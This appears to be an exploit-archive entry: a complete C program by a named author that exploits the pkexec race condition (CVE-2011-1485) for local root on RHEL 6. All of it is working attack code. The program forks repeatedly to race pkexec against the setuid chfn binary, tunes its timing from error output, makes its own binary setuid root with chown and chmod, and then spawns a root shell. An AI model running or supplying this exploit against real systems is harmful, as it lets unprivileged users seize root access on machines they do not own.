/*
* Exploit Title: pkexec Race condition (CVE-2011-1485) exploit
* Author: xi4oyu
* Tested on: rhel 6
* CVE : 2011-1485
* Linux pkexec exploit by xi4oyu , thx dm@0x557.org * Have fun~
¡Á U can reach us  @ http://www.wooyun.org :)
*/
#include <stdio.h>
#include <limits.h>
#include <time.h>
#include <unistd.h>
#include <termios.h>
#include <sys/stat.h>
#include <errno.h>
#include <poll.h>
#include <sys/types.h>
#include <stdlib.h>
#include <string.h>

int main(int argc,char *argv[], char ** envp)
{
 
 time_t tim_seed1;
 pid_t pid_seed2;
 int result;
 struct stat stat_buff;
 
 char * chfn_path = "/usr/bin/chfn";
 char cmd_buff[4096];
 
 char * pkexec_argv[] = {
  "/usr/bin/pkexec",
  "/bin/sh",
  "-c",
  cmd_buff,
  NULL
 };
 int pipe1[2];
 int pipe2[2];
 int pipe3[2]; 
 pid_t pid,pid2 ;
 char * chfn_argv[] = {
  "/usr/bin/chfn",
  NULL
 };

 char buff[8];
 char read_buff[4096];
 char real_path[512]; 
 struct termios termios_p;
 
 int count = 0;
 int flag = 0;
 int usleep1 = 0;
 int usleep2 = 0;

 
 bzero(cmd_buff,4096);
 bzero(real_path,512);
 realpath(argv[0],real_path);
 
 tim_seed1 = time(NULL);
 pid_seed2 = getpid();
 srand(tim_seed1+pid_seed2);
 

 
 
 //get terminal attr
 tcgetattr(0,&termios_p);
 snprintf(cmd_buff,4095,"/bin/chown root:root %s; /bin/chmod 4755 %s",real_path,real_path);
// printf("Cmd line:%s",cmd_buff);
 if(! geteuid()){
 //Succs => r00t!
  char * exec_argv[2]={
   "/bin/sh",
   NULL
  };
  setuid(0);
  setgid(0);
  execve("/bin/sh",exec_argv,0);
  perror("execve shell");
  exit(-1);
 }

 printf("pkexec local root exploit by xi4oyu , thx to dm\n");
 
 if(pipe(pipe1)){
  perror("pipe");
  exit(-2);
 }
 
 for(count = 500; count && !flag; count--){
 
 // printf("Count %d\n",count);
  pid = fork();
  if( !pid ){
   // Parent
   if( !pipe(pipe2)){
   
    if(!pipe(pipe3)){
     pid2 = fork();
     if(!pid2){
      // Parent 2
      close(1);
      close(2);
      close(pipe1[0]);
      dup2(pipe1[1],2);
      dup2(pipe1[1],1);
      close(pipe1[1]);
      close(pipe2[0]);
      close(pipe3[1]);
      write(pipe2[1],"\xFF",1);
      read(pipe3[0],&buff,1);
          
      execve(pkexec_argv[0],pkexec_argv,envp);
      perror("execve pkexec");
      exit(-3);
     
     }
     close(0);
     close(1);
     close(2);
     close(pipe2[1]);
     close(pipe3[0]);
     read(pipe2[0],&buff,1);
     write(pipe3[1],"\xFF",1);
     usleep(usleep1+usleep2);

     execve(chfn_argv[0],chfn_argv,envp);
     perror("execve setuid");
     exit(1);
    }
    

   }
   perror("pipe3");
   exit(1);    
  }
  
  //Note: This is child, no pipe3 we use poll to monitor pipe1[0]
  memset(pipe3,0,8);
  
  struct pollfd * pollfd = (struct pollfd *)(&pipe3);
  pollfd->fd = pipe1[0];
  pollfd->events =  POLLRDNORM;
  
  if(poll(pollfd,1,1000) < 0){
  
   perror("poll");
   exit(1);
  }
  
  if(pollfd->revents & POLLRDNORM ){
   memset(read_buff,0,4096);
   read(pipe1[0],read_buff,4095);
   if( strstr(read_buff,"does not match")){
    usleep1 += 500;
    usleep2 = rand() % 1000;
   
   }else{
    usleep1 -= 500;
    
   
   }
  
  
  }
  
  if(!stat(real_path,&stat_buff)){
   if(!stat_buff.st_uid){
    if(!stat_buff.st_gid){
     if(stat_buff.st_mode & 0x800){
      
      char *exec_array[]={
       real_path,
       NULL
      };
      
      flag = 1;
      tcsetattr(0,2,&termios_p);
      execve(real_path,exec_array,0);
      perror("execve self");
      exit(1);
     }
    }
   
   }
  }
  
  tcsetattr(0,2,&termios_p);
 
 }
  result = 0;
  return result;

}